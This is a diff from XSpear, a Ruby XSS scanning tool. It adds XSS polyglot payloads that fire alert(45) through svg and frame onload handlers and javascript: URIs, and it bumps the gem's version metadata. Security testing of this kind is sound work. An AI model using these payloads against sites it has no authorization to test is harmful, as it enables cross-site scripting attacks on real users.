-    r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
+    # Check Selenium XSS Polyglot
+    r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
 
 
     # Check Blind XSS Payload
@@ -504,7 +509,7 @@ class XspearScan
           end
         end
       rescue StandardError
-        result.push("inject": 'url',"param":"error", "type": type, "query": '', "pattern": pattern, "desc": desc, "category": category, "callback": callback)
+        # bypass
       end
       result
     end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: XSpear
 version: !ruby/object:Gem::Version
-  version: 1.0.8
+  version: 1.0.9
 platform: ruby
 authors:
 - hahwul
 autorequire: 
 bindir: exe
 cert_chain: []
-date: 2019-07-24 00:00:00.000000000 Z
+date: 2019-07-25 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize